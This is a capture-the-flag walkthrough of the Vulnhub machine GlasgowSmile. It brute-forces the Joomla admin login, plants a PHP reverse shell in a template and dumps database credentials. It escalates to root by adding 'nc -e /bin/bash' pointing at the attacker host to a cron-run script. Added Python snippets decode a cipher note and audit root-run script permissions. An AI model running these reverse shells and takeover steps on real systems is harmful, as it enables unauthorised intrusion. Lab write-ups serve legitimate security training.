[VLN] Glasgow Smile

Today we are going to hack the Vulnhub machine called GlasgowSmile. You can download it from the following link: https://www.vulnhub.com/entry/glasgow-smile-11,491/
  • Enumeration
    We start with an nmap scan to see which ports are open.
    sml@m0nique:~$ nmap -A -p- 192.168.112.138
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 20:44 CEST
    Nmap scan report for 192.168.112.138
    Host is up (0.00067s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
    |   256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
    |_  256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.37 seconds
    We look at port 80 in more detail.
    sml@m0nique:~$ gobuster dir -u http://192.168.112.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.112.138
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     html,txt,php
    [+] Timeout:        10s
    ===============================================================
    2020/06/17 20:45:33 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /joomla (Status: 301)
    /how_to.txt (Status: 200)
    /server-status (Status: 403)
    ===============================================================
    2020/06/17 20:47:09 Finished
    ===============================================================
    We see it has a /joomla directory. If we visit http://192.168.112.138/joomla/index.php we can see the website, which contains dialogue from the film, etc. We build a wordlist with the following command:
    sml@m0nique:~$ cewl http://192.168.112.138/joomla/index.php > dicjoker.txt
    Now we launch Burp Suite, visit http://192.168.112.138/joomla/administrator/index.php, which is where the Joomla administration panel lives, and try any username in order to capture the request. Once we have the request, we send it to "Intruder" in Burp Suite and brute-force it. As the username we use "joomla" and as the wordlist the one we just created (dicjoker.txt). After a short while we get the credentials! joomla/Gotham
  • Low Shell
    Now that we have the credentials, we log in at http://192.168.112.138/joomla/administrator/index.php and prepare a reverse shell.
    sml@m0nique:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
    sml@m0nique:~$ mv php-reverse-shell.php rshell.php
    sml@m0nique:~$ nano rshell.php   # We edit it to set our IP/port.
    We go to Extensions -> Templates -> Templates. In Styles we see that the default is Protostar, so we go to Templates -> Protostar -> index.php and paste the reverse shell there. We click "Save" and set nc listening.
    sml@m0nique:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    Then we visit http://192.168.112.138/joomla/index.php
    sml@m0nique:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 57540
    Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
     17:57:31 up  4:14,  0 users,  load average: 0.00, 0.00, 0.01
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c 'import pty; pty.spawn("/bin/bash");'
    We are in as www-data :)
    www-data@glasgowsmile:/$ cd /var/www/html/joomla
    www-data@glasgowsmile:/var/www/html/joomla$ cat configuration.php
    ---SNIP---
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'joomla';
    public $password = 'babyjoker';
    public $db = 'joomla_db';
    ---SNIP---
    Now that we have these credentials, we take a look at the database.
    www-data@glasgowsmile:/$ mysql -u joomla -p
    mysql -u joomla -p
    Enter password: babyjoker
    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 31253
    Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    MariaDB [(none)]> show databases;
    show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | batjoke            |
    | information_schema |
    | joomla_db          |
    | mysql              |
    | performance_schema |
    +--------------------+
    5 rows in set (0.003 sec)

    MariaDB [(none)]> use batjoke;
    use batjoke;
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Database changed
    MariaDB [batjoke]> show tables;
    show tables;
    +-------------------+
    | Tables_in_batjoke |
    +-------------------+
    | equipment         |
    | taskforce         |
    +-------------------+
    2 rows in set (0.000 sec)

    MariaDB [batjoke]> select * from taskforce;
    select * from taskforce;
    +----+---------+------------+---------+----------------------------------------------+
    | id | type    | date       | name    | pswd                                         |
    +----+---------+------------+---------+----------------------------------------------+
    |  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
    |  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
    |  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
    |  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
    |  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
    |  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
    +----+---------+------------+---------+----------------------------------------------+
    6 rows in set (0.000 sec)
    We see there is a "name" rob, the same as one of the system users, so we check whether we can get his password by base64-decoding the string.
    sml@m0nique:~$ echo "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/" | base64 -d
    ???AllIHaveAreNegativeThoughts???
    Looks like we have the password :)
    sml@m0nique:~$ ssh rob@192.168.112.138
    rob@192.168.112.138's password:
    Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
    rob@glasgowsmile:~$
  • user.txt
    rob@glasgowsmile:~$ ls -la
    total 52
    drwxr-xr-x 3 rob  rob  4096 Jun 16 13:04 .
    drwxr-xr-x 5 root root 4096 Jun 15 06:34 ..
    -rw-r----- 1 rob  rob   454 Jun 14 03:20 Abnerineedyourhelp
    -rw------- 1 rob  rob     7 Jun 17 13:43 .bash_history
    -rw-r--r-- 1 rob  rob   220 Jun 13 12:51 .bash_logout
    -rw-r--r-- 1 rob  rob  3526 Jun 13 12:51 .bashrc
    -rw-r----- 1 rob  rob   313 Jun 14 03:23 howtoberoot
    drwxr-xr-x 3 rob  rob  4096 Jun 13 16:27 .local
    -rw------- 1 rob  rob    81 Jun 15 04:08 .mysql_history
    -rw-r--r-- 1 rob  rob   807 Jun 13 12:51 .profile
    -rw-r--r-- 1 rob  rob    66 Jun 15 04:14 .selected_editor
    -rw-r----- 1 rob  rob    38 Jun 13 16:41 user.txt
    -rw------- 1 rob  rob   429 Jun 16 13:04 .Xauthority
    rob@glasgowsmile:~$ cat user.txt
    JKR[f5bb11acbb957915e421d62e7253d27a]
    We take a look at the file called Abnerineedyourhelp.
    rob@glasgowsmile:~$ cat Abnerineedyourhelp
    Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's." Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz.
    RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
    It is ciphertext... it looks like something close to ROT13, so we use CyberChef to try ROT13 and variations of it. We paste the text into CyberChef and pick ROT13 with "amount" 1. The result is:
    Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't." Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
    The last string looks like base64, so...
    sml@m0nique:~$ echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d
    I33hope99my0death000makes44more8cents00than0my0life0
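As an added example (not part of the original write-up), the same two-step decode done in Python: a Caesar shift of 1, which is what CyberChef's "ROT13, amount 1" performs, followed by base64 on the trailing token. The word-scoring shift guesser and the constant NOTE (the text of Abnerineedyourhelp as shown above) are mine, not from the box:

```python
"""Added example (not from the write-up): redo the CyberChef "ROT13, amount 1"
step and the base64 step on rob's Abnerineedyourhelp note, offline."""
import base64
import string

def caesar_shift(text: str, amount: int) -> str:
    """Shift letters by `amount`, keeping case; digits, '=' and punctuation
    pass through unchanged (same semantics as CyberChef's ROT13 operation)."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + amount) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + amount) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)

def likely_shift(ciphertext: str) -> int:
    """Try all 26 shifts and pick the one yielding the most common English words."""
    common = {"the", "and", "you", "his", "is", "to", "of", "can", "need", "help"}
    scores = []
    for k in range(26):
        words = caesar_shift(ciphertext, k).lower().split()
        scores.append(sum(w.strip(",.\"'") in common for w in words))
    return scores.index(max(scores))

def decode_note(ciphertext: str, amount: int) -> tuple[str, str]:
    """Return (shifted plaintext, base64-decoded last token of that plaintext)."""
    plain = caesar_shift(ciphertext, amount)
    token = plain.split()[-1]
    return plain, base64.b64decode(token, validate=True).decode()

# Ciphertext exactly as shown by `cat Abnerineedyourhelp` on the box.
NOTE = ("Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd "
        "rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. "
        "Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, \"Sgd vnqrs ozqs ne gzuhmf z "
        "ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's.\" Mnv H mddc "
        "xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd "
        "dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==")

if __name__ == "__main__":
    k = likely_shift(NOTE)
    plain, secret = decode_note(NOTE, k)
    print(f"shift={k}\n{plain}\n-> {secret}")
```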
    We get what looks like a password, so let's log in as abner.
    sml@m0nique:~$ ssh abner@192.168.112.138
    abner@192.168.112.138's password:
    Permission denied, please try again.
    abner@192.168.112.138's password:
    Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Jun 16 13:20:04 2020 from 192.168.10.172
    abner@glasgowsmile:~$
  • user2.txt
    abner@glasgowsmile:~$ cat user2.txt
    JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
    We look for files we can play with.
    abner@glasgowsmile:/home/penguin$ find / -user abner 2>/dev/null
    /home/abner
    /home/abner/user2.txt
    /home/abner/.bash_history
    /home/abner/.bashrc
    /home/abner/.Xauthority
    /home/abner/info.txt
    /home/abner/.bash_logout
    /home/abner/.profile
    /home/abner/.ssh
    /home/abner/.ssh/known_hosts
    /home/abner/.local
    /home/abner/.local/share
    /home/abner/.local/share/nano
    /var/www/html/joker.jpg
    /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
    We see there is a somewhat hidden .zip file... We copy it to /tmp and unzip it using the password we used to log in as abner.
    abner@glasgowsmile:~$ cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp
    abner@glasgowsmile:~$ cd /tmp
    abner@glasgowsmile:/tmp$ unzip .dear_penguins.zip
    Archive:  .dear_penguins.zip
    [.dear_penguins.zip] dear_penguins password:
      inflating: dear_penguins
    abner@glasgowsmile:/tmp$ cat dear_penguins
    My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
    scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
    We use the last string as the "password" to log in as penguin.
    sml@m0nique:~$ ssh penguin@192.168.112.138
    penguin@192.168.112.138's password:
    Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Jun 16 13:20:25 2020 from 192.168.10.172
    penguin@glasgowsmile:~$
    We explore the system a bit more.
  • user3.txt
    penguin@glasgowsmile:~$ ls -la
    total 40
    drwxr-xr-x 5 penguin penguin 4096 Jun 16 11:58 .
    drwxr-xr-x 5 root    root    4096 Jun 15 06:34 ..
    -rw------- 1 penguin penguin    7 Jun 17 13:43 .bash_history
    -rw-r--r-- 1 penguin penguin  220 Jun 15 06:34 .bash_logout
    -rw-r--r-- 1 penguin penguin 3526 Jun 15 06:34 .bashrc
    drwxr-xr-x 3 penguin penguin 4096 Jun 15 12:01 .local
    -rw-r--r-- 1 penguin penguin  807 Jun 15 06:34 .profile
    drwxr--r-- 2 penguin penguin 4096 Jun 16 12:52 SomeoneWhoHidesBehindAMask
    drwx------ 2 penguin penguin 4096 Jun 15 11:22 .ssh
    -rw------- 1 penguin penguin   58 Jun 15 11:20 .Xauthority
    penguin@glasgowsmile:~$ cd SomeoneWhoHidesBehindAMask/
    penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -la
    total 332
    drwxr--r-- 2 penguin penguin   4096 Jun 16 12:52 .
    drwxr-xr-x 5 penguin penguin   4096 Jun 16 11:58 ..
    -rwSr----- 1 penguin penguin 315904 Jun 15 11:45 find
    -rw-r----- 1 penguin root      1457 Jun 15 11:50 PeopleAreStartingToNotice.txt
    -rwxr-xr-x 1 penguin root       612 Jun 16 12:50 .trash_old
    -rw-r----- 1 penguin penguin     38 Jun 16 12:52 user3.txt
    penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt
    JKR{284a3753ec11a592ee34098b8cb43d52}
    We also look at the other .txt to see if it gives us a hint.
    penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat PeopleAreStartingToNotice.txt
    Hey Penguin,
    I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.
    Joker
    Knowing this, let's use pspy64 to see if "someone" does something....
    penguin@glasgowsmile:/tmp$ wget http://192.168.112.128/pspy64
    --2020-06-19 17:46:48--  http://192.168.112.128/pspy64
    Connecting to 192.168.112.128:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3078592 (2.9M) [application/octet-stream]
    Saving to: ‘pspy64.1’

    pspy64.1            100%[==================================>]   2.94M  --.-KB/s    in 0.03s

    2020-06-19 17:46:48 (112 MB/s) - ‘pspy64.1’ saved [3078592/3078592]

    penguin@glasgowsmile:/tmp$ chmod +x pspy64
    penguin@glasgowsmile:/tmp$ ./pspy64
    ---SNIP---
    2020/06/19 17:07:01 CMD: UID=0    PID=786    | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
    ---SNIP---
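pspy shows a root process (UID=0) executing a file that lives in penguin's home and is owned by penguin. As an added example, not from the write-up, here is the check an administrator can run over any script root executes unattended: it flags a non-root owner, group or world write bits, and writable parent directories. The uid 1002 used for penguin is a placeholder, since the write-up does not give it:

```python
"""Added defender-side check (not from the write-up): for a script that root
runs unattended, report whether a non-root account could modify it or replace
it through a writable parent directory."""
import os
import stat
import tempfile

def writable_by_non_root(uid: int, gid: int, mode: int) -> list[str]:
    """Reasons a non-root principal can alter this path; [] means only root can.
    A non-root owner is flagged even at mode 755: an owner can chmod it back."""
    reasons = []
    if uid != 0:
        reasons.append(f"owned by uid {uid}, not root")
    if mode & stat.S_IWGRP and gid != 0:
        reasons.append(f"group-writable by gid {gid}")
    # A sticky, world-writable directory (/tmp style) does not let users
    # rename or unlink entries they do not own, so it is not a finding.
    sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)
    if mode & stat.S_IWOTH and not sticky_dir:
        reasons.append("world-writable")
    return reasons

def audit_path(path: str) -> dict[str, list[str]]:
    """Walk from the script up to '/', recording every component a non-root
    user could alter; any hit means the root-run script is tamperable."""
    findings = {}
    current = os.path.realpath(path)
    while True:
        st = os.stat(current)
        reasons = writable_by_non_root(st.st_uid, st.st_gid, st.st_mode)
        if reasons:
            findings[current] = reasons
        parent = os.path.dirname(current)
        if parent == current:
            return findings
        current = parent

if __name__ == "__main__":
    # Constructed from the listing "-rwxr-xr-x 1 penguin root ... .trash_old";
    # penguin's numeric uid is not in the write-up, 1002 is a placeholder.
    print("as listed:", writable_by_non_root(1002, 0, 0o100755))
    print("hardened :", writable_by_non_root(0, 0, 0o100755))
    with tempfile.NamedTemporaryFile(suffix=".sh") as tmp:
        print("live     :", audit_path(tmp.name))
```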
  • Privilege Escalation
    We see that root executes the file /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old, which we can edit! We add the following line to get a reverse shell as root:
    nc -e /bin/bash 192.168.112.128 5555
    The file would look like this.
    penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
    #/bin/sh
    nc -e /bin/bash 192.168.112.128 5555
    exit 0
    We set nc listening.
    sml@m0nique:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    And after a while...
    connect to [192.168.112.128] from (UNKNOWN) [192.168.112.138] 41266
    python3 -c 'import pty; pty.spawn("/bin/bash");'
    root@glasgowsmile:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
  • root.txt
    root@glasgowsmile:~# cd /root
    cd /root
    root@glasgowsmile:~# ls
    ls
    root.txt
    whoami
    root@glasgowsmile:~# cat root.txt
    Congratulations! You've got the Glasgow Smile!
    JKR{68028b11a1b7d56c521a90fc18252995}
    Credits by mindsflee
  • End
    And with that we are root on the machine :)